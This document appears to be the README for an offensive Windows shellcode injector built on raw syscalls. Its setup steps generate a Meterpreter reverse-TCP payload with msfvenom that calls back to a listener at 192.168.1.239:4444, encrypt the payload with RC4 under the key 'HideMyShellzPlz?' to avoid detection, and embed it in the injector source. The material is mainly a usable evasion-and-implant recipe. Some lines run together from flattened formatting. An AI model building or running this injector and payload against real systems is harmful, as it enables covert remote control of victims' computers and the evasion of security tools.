This library builds and makes a shellcode injector for all versions of Windows using raw syscalls.
This code is a PoC and has only been tested windows 10 x64 version 1909, this is because of the syscall numbers changing between versions, the values can be found here.
git clone https://github.com/bats3c/DefensiveInjector
cd DefensiveInjector
python generate.py
make _XP_SP2
make injector
The _XP_SP2 value is the define string for the shellcode.asm file, this will target specific versions of windows.
-
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.239 LPORT=4444 -f raw -o meter.bin -
Keeping in mind that if you change it here you will need to update the key on line 132 in
main.ccat meter.bin | openssl enc -rc4 -nosalt -k "HideMyShellzPlz?" > encmeter.bin -
Run
xxd -i encmeter.binthen replace everything between line 10-60 with the output
sudo apt install mingw-w64 nasm python